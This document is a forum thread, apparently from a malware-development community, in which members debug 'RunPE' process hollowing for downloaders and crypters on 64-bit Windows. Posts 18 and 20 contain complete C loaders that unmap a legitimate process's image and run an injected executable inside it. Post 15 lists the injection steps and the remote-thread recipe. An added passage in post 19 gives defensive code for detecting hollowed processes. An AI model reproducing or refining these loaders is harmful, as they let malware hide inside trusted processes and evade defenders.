Thread: [REQ] FWB++

  #11 - Senior Member, Join Date: Nov 2011, Posts: 110
    SqUeEzEr
    I'm using the well-known method by cryptic3, don't have any idea why it fails.
    Joefish
    DEP is set by default, the code section has CODE|EXECUTE|READ access. Should I change it to the PAGE_EXECUTE_READWRITE option?
    AFAIK, when copying the full image into another process's memory, it sets it up by default (when creating the process with the CREATE_SUSPENDED flag).
    --
    edit: I'm allocating space with VirtualAllocEx in the remote process's memory with PAGE_EXECUTE_READWRITE, don't know how to change it any other way. Anyone got a working example here? Gonna study it. Thank you. ;-)
    Last edited by Overflowz; 3 Weeks Ago at 10:26.

  #12 - Senior Member, Join Date: May 2010, Location: /system, Posts: 318
    cryptic3 runPE: failing injection of an x86 PE into an x86 process on Windows 7 64-bit,
    and when running on Windows XP, Vista, Win7 x86 it's working.
    I don't get it.
    @joefish: why would you need to embed a PE or a DLL into a foreign process for a downloader? I mean a small download-and-exec shellcode will do fine.
    i prefer backseat rather than storming the front.
    sniper's way xD

  #13 - Senior Member, Join Date: Nov 2011, Posts: 110
    For me, it doesn't even work in any version of Windows (XP/Vista/7); it still fails when trying to inject into some Microsoft-based application.

  #14 - Senior Member, Join Date: May 2010, Location: /system, Posts: 318
    I lost the original code you sent me before, post that again.
    I think cryptic3 didn't VirtualProtect the sections.

  #15 - Night's Watch, Join Date: Oct 2009, Location: Clng(&H1337 Xor &H11AD), Posts: 361
    Quote Originally Posted by The Executer:
    cryptic3 runPE: failing injection of an x86 PE into an x86 process on Windows 7 64-bit,
    and when running on Windows XP, Vista, Win7 x86 it's working.
    I don't get it.
    @joefish: why would you need to embed a PE or a DLL into a foreign process for a downloader? I mean a small download-and-exec shellcode will do fine.
    He didn't specify which language he'd be using, so for all I know he might be using vb (and there is no way he'll be able to inject a remote thread with that, unless he does use actual shellcode).

    I didn't invent those FWB#++ things, they were just terms I had come across a long time ago.

    Just so you know what has to be done in the RunPE:
    NtUnmapViewOfSection <-- Get the remote process's imagebase from its PEB, then unmap it if it is the same as the one you are injecting (you could just unmap it no matter what I guess, I don't see why not)
    VirtualAllocEx <-- Allocate space in the remote process at your injected PE's imagebase, size = SizeOfImage, PAGE_READWRITE (no need for anything to be executable just yet)
    ...write the headers to the remote process...
    WriteProcessMemory <-- Loop through the sections and write them to the remote process... if this succeeds then
    VirtualProtectEx <-- Set the page protection for that section to correspond to that section's characteristics (the .text section will be set to PAGE_EXECUTE_READWRITE; all of that will be taken care of automatically if you parse them correctly)

    It wouldn't surprise me if cryptic didn't VirtualProtectEx... most people who use it wouldn't notice.

    If you are using C or some shit like that then just inject a thread... you know the drill: OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread.

    Code to express, not to impress make f*in money lol learn

    http://i46.tinypic.com/kbx853.png

  #16 - Senior Member, Join Date: May 2010, Location: /system, Posts: 318
    I know this guy, he's using C.

  #17 - Senior Member, Join Date: May 2010, Location: /system, Posts: 318
    joefish, we know how runPE is done. It's just that it won't work on an x64 OS while it works fine on an x86 OS. And before you ask, I am also injecting x86 into x86,
    and it won't work for calc & notepad. The rest all work fine.
    I modified cryptic3's code a little bit to get it working. The only problem is calc.exe isn't injecting into any normal executable I made, while it's perfectly getting inside notepad and calc (x86) in an x64 environment. The rest of the binaries are working regardless of the shell (covering). The only problem is calc.
    Also, I am setting the attributes correctly.
    LOL, I just checked the loadexe 2004 POC by that Chinese guy.
    It doesn't allow injecting calc.exe into a simple process. In short, the same problem as me.
    Quote Originally Posted by Joefish:
    If you are using C or some shit like that then just inject a thread... you know the drill: OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread.
    We are talking about PE injection, not thread injection.
    Last edited by The Executer; 3 Weeks Ago at 03:41.

  #18 - Senior Member, Join Date: Nov 2011, Posts: 110
    Look at this code carefully.
    Code:
    #include <windows.h>
    #define ORIGIN_NAME "testapp1.exe"
    #define TARGET_NAME "calc.exe"
    typedef int (WINAPI*unmap)(HANDLE,PVOID);
    int main(int argc, char* argv[])
    {
        unmap ZwUnmap = (unmap)GetProcAddress(LoadLibrary("ntdll.dll"),"ZwUnmapViewOfSection");
        //both are local files, copying first one into the memory buffer.
        PROCESS_INFORMATION pi;
        HANDLE hFile = CreateFile(ORIGIN_NAME,GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL);
        int size = GetFileSize(hFile,NULL);
        char* hMem = VirtualAlloc(NULL,size,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
        DWORD rbytes; //bytes-read counter: ReadFile wants a pointer to a DWORD, not a DWORD pointer
        ReadFile(hFile,hMem,size,&rbytes,NULL);
        CloseHandle(hFile);
        //Initializing structures.
        PIMAGE_DOS_HEADER pidh;
        pidh = (PIMAGE_DOS_HEADER)hMem;
        PIMAGE_NT_HEADERS pinh;
        pinh = (PIMAGE_NT_HEADERS)&hMem[pidh->e_lfanew];
        STARTUPINFO si;
        memset(&si,0,sizeof(si));
        //Create Process in suspended state.
        CreateProcess(TARGET_NAME,NULL,NULL,NULL,1,CREATE_SUSPENDED,NULL,NULL,&si,&pi);
        CONTEXT ctx;
        ctx.ContextFlags = CONTEXT_FULL;
        GetThreadContext(pi.hThread,&ctx);
        ctx.Eax = pinh->OptionalHeader.ImageBase + pinh->OptionalHeader.AddressOfEntryPoint;
        //Free remote process memory.
        //VirtualFreeEx(pi.hProcess,(LPVOID)pinh->OptionalHeader.ImageBase,0,MEM_RELEASE); //I don't see any point using ZwUnmapViewOfSection instead of this.
        DWORD addr;
        ReadProcessMemory(pi.hProcess,(VOID*)(ctx.Ebx+8),&addr,4,NULL);
        ZwUnmap(pi.hProcess,(PVOID)addr); //unmap at remote process ImageBase
        //ZwUnmap(pi.hProcess,(PVOID)pinh->OptionalHeader.ImageBase); //unmap section base address
        //Allocate new space into remote process and write DOS+NT headers there.
        VirtualAllocEx(pi.hProcess,(PVOID)pinh->OptionalHeader.ImageBase,pinh->OptionalHeader.SizeOfImage,MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE);
        WriteProcessMemory(pi.hProcess,(LPVOID)pinh->OptionalHeader.ImageBase,hMem,pinh->OptionalHeader.SizeOfHeaders,NULL);
        //Copy sections at their place into remote process.
        int i;
        PIMAGE_SECTION_HEADER pish;
        for (i=0;i < pinh->FileHeader.NumberOfSections;i++)
        {
            pish = (PIMAGE_SECTION_HEADER)&hMem[pidh->e_lfanew + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER) *i];
            WriteProcessMemory(pi.hProcess,(LPVOID)(pinh->OptionalHeader.ImageBase + pish->VirtualAddress),&hMem[pish->PointerToRawData],pish->SizeOfRawData,NULL);
        }
        SetThreadContext(pi.hThread,&ctx);
        ResumeThread(pi.hThread); //Go!
        return 0;
    }
    As you can see, I don't need to call VirtualProtectEx; VirtualAllocEx does the protection job itself.

  #19 - Night's Watch, Join Date: Oct 2009, Location: Clng(&H1337 Xor &H11AD), Posts: 361
    Quote Originally Posted by The Executer:
    joefish, we know how runPE is done. It's just that it won't work on an x64 OS while it works fine on an x86 OS. And before you ask, I am also injecting x86 into x86,
    and it won't work for calc & notepad. The rest all work fine.
    I modified cryptic3's code a little bit to get it working. The only problem is calc.exe isn't injecting into any normal executable I made, while it's perfectly getting inside notepad and calc (x86) in an x64 environment. The rest of the binaries are working regardless of the shell (covering). The only problem is calc.
    Also, I am setting the attributes correctly.
    LOL, I just checked the loadexe 2004 POC by that Chinese guy.
    It doesn't allow injecting calc.exe into a simple process. In short, the same problem as me.
    Quote Originally Posted by Joefish:
    If you are using C or some shit like that then just inject a thread... you know the drill: OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread.
    We are talking about PE injection, not thread injection.
    Here are my results:
                                          Injection on x86   Injection on x64
    Injection to self (x86 proggie)       Success            Success
    Injection to calc (x86 and x64)       Success            Fail (process created but my code was not executed)
    Injection to notepad (x86 and x64)    Success            Fail (process created but my code was not executed)
    It doesn't surprise me that I'm not able to inject a 32bit PE into a 64bit PE.

    I know you're talking about PE injection; when you said "why would you need to imbed a PE or a dll into foreign process for a downloader? i mean a small download and exec shellcode will do fine" I elaborated on that point, telling people how that would be done.

    Quote Originally Posted by Overflowz:
    Look at this code carefully.
    Code: (the RunPE listing from post #18 above, quoted in full)
    As you can see, I don't need to call VirtualProtectEx; VirtualAllocEx does the protection job itself.
    Making everything executable shouldn't be the solution. Whether it works or not that is a very "sledgehammer" way of doing this. Sorry if my advice didn't assist you.
    Last edited by Joefish; 3 Weeks Ago at 04:23.

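A detection-side counterpart to the RunPE steps Joefish lists in post #15 and to his remark here that making the whole image executable is a sledgehammer: an added example, not code from the thread or from cryptic3, that scores the memory regions at a process's PEB ImageBase for hollowing. The region_t record, the three constructed layouts and the assumption that a real scanner would fill them from VirtualQueryEx are mine; the MEM_*/PAGE_* values are the real winnt.h constants.

```c
/* Added example, not code from the thread: flag a process whose executable
 * image was replaced by a RunPE-style loader. Region records model what
 * VirtualQueryEx returns; they are constructed here, not read from a process. */
#include <stddef.h>
#include <stdint.h>

#define MEM_PRIVATE            0x20000u   /* Win32 values from winnt.h */
#define MEM_IMAGE            0x1000000u
#define PAGE_READONLY            0x02u
#define PAGE_READWRITE           0x04u
#define PAGE_EXECUTE_READ        0x20u
#define PAGE_EXECUTE_READWRITE   0x40u

typedef struct { uintptr_t base; size_t size; uint32_t protect; uint32_t type; } region_t;
enum { HOLLOW_NONE = 0, HOLLOW_NO_REGION = 1, HOLLOW_NOT_IMAGE = 2, HOLLOW_RWX = 4 };

/* Bitmask of indicators over the regions overlapping [image_base, +size_of_image),
 * image_base being what the PEB reports. A normally loaded EXE is backed by a
 * section view (Type == MEM_IMAGE) and has no writable+executable pages; after
 * NtUnmapViewOfSection + VirtualAllocEx the range is MEM_PRIVATE instead, and a
 * loader that allocates the whole image PAGE_EXECUTE_READWRITE adds RWX pages. */
int hollow_indicators(const region_t *r, size_t n,
                      uintptr_t image_base, size_t size_of_image)
{
    int flags = HOLLOW_NONE, covered = 0;
    for (size_t i = 0; i < n; i++) {
        if (r[i].base + r[i].size <= image_base ||
            r[i].base >= image_base + size_of_image)
            continue;                                   /* not part of the image */
        covered = 1;
        if (r[i].type != MEM_IMAGE)                 flags |= HOLLOW_NOT_IMAGE;
        if (r[i].protect == PAGE_EXECUTE_READWRITE) flags |= HOLLOW_RWX;
    }
    return covered ? flags : HOLLOW_NO_REGION;          /* nothing mapped at all */
}

/* Constructed layouts for a 32-bit image at 0x400000 with SizeOfImage 0x5000 */
static const region_t legit[] = {                       /* mapped by the loader */
    { 0x400000, 0x1000, PAGE_READONLY,          MEM_IMAGE },
    { 0x401000, 0x3000, PAGE_EXECUTE_READ,      MEM_IMAGE },
    { 0x404000, 0x1000, PAGE_READWRITE,         MEM_IMAGE } };
static const region_t hollow_rwx[] = {                  /* one RWX VirtualAllocEx, as in post #18 */
    { 0x400000, 0x5000, PAGE_EXECUTE_READWRITE, MEM_PRIVATE } };
static const region_t hollow_sections[] = {             /* per-section VirtualProtectEx, as in post #20 */
    { 0x400000, 0x1000, PAGE_READWRITE,         MEM_PRIVATE },
    { 0x401000, 0x3000, PAGE_EXECUTE_READ,      MEM_PRIVATE },
    { 0x404000, 0x1000, PAGE_READWRITE,         MEM_PRIVATE } };
#define N(a) (sizeof(a) / sizeof((a)[0]))
```

The per-section variant from post #20 no longer trips the RWX check, but the MEM_PRIVATE indicator still fires, because VirtualProtectEx cannot turn private memory back into an image-backed section view.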

  #20 - Senior Member, Join Date: May 2010, Location: /system, Posts: 318


    Below is the function.
    It's doing everything fine in an x86 environment.
    One example:
    injecting calc.exe (x86 PE) into a test application (x86) process: success.

    But the same thing in x64 fails,
    i.e. injecting calc.exe (x86 PE) into a test application (x86) process fails in an x64 environment.

    But when injecting calc.exe (x86 PE) into notepad (x86 PE): success in an x64 environment.
    Basically, whenever I choose a shell (covering / hollowed process) of a Windows prebuilt application it injects calc,
    but when I choose my own exe it won't work, while the same thing regardless of shell/covering works on x86,
    and it's creating problems only for calc.

    Code:
    BOOL memexe(LPVOID pBuffer, LPTSTR szTargetProc, LPTSTR szParameters)
    {
    	DWORD dwBaseAddr, dwBytes;
    	LPVOID pBase;
    
    	DWORD x,i;
    
    	PROCESS_INFORMATION pi;
    	STARTUPINFO si;
    
    	CONTEXT Context;
    
    	PIMAGE_NT_HEADERS pNT = NULL;
    	PIMAGE_SECTION_HEADER pSections = NULL;
    
    	memset((BYTE*)&si, 0, sizeof(STARTUPINFO));
    	memset((BYTE*)&pi, 0, sizeof(PROCESS_INFORMATION));
    
    	si.cb = sizeof(STARTUPINFO);
    	si.wShowWindow = 0;
    	if (CreateProcess(NULL, szTargetProc, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi))
    	{
    		Context.ContextFlags = CONTEXT_INTEGER;
    
    		if (GetThreadContext(pi.hThread, &Context))
    		{
    			if (ReadProcessMemory(pi.hProcess, (LPCVOID)(Context.Ebx + 8), &dwBaseAddr, sizeof(DWORD), &dwBytes))
    			{
    				if (NtUnmapViewOfSection(pi.hProcess, (LPVOID)dwBaseAddr) >= 0)
    				{
    					pNT = (PIMAGE_NT_HEADERS)((char*)pBuffer + ((PIMAGE_DOS_HEADER)pBuffer)->e_lfanew);
    
    					pBase = (LPVOID)VirtualAllocEx(pi.hProcess, (LPVOID)pNT->OptionalHeader.ImageBase, pNT->OptionalHeader.SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    
    					if (pBase)
    					{
    						if (WriteProcessMemory(pi.hProcess, pBase, pBuffer, pNT->OptionalHeader.SizeOfHeaders, &dwBytes))
    						{
    							pSections = (PIMAGE_SECTION_HEADER)((char*)pNT + sizeof(DWORD) + sizeof(IMAGE_FILE_HEADER) + pNT->FileHeader.SizeOfOptionalHeader);
    
    							for (i = 0; i < pNT->FileHeader.NumberOfSections; i++)
    							{
    								
    							WriteProcessMemory(pi.hProcess, (LPVOID)((DWORD)pBase + pSections[i].VirtualAddress), (LPVOID)((DWORD)pBuffer + pSections[i].PointerToRawData), pSections[i].SizeOfRawData, &dwBytes);
    							VirtualProtectEx(pi.hProcess, (LPVOID)((DWORD)pBase + pSections[i].VirtualAddress), pSections[i].Misc.VirtualSize, Mapping[pSections[i].Characteristics >> 29], &dwBytes);
    							}
    
    							if (i == pNT->FileHeader.NumberOfSections && WriteProcessMemory(pi.hProcess, (LPVOID)(Context.Ebx + 8), &pBase, sizeof(LPVOID), &dwBytes))
    							{
    								Context.Eax = (DWORD)pBase + pNT->OptionalHeader.AddressOfEntryPoint;
    								if (SetThreadContext(pi.hThread, &Context) != 0)
    								{
    									ResumeThread(pi.hThread);
    									return TRUE;
    								}
    							}
    						}
    					}
    				}
    			}
    		}
    		TerminateProcess(pi.hProcess, 0);
    	}
    	return FALSE;
    }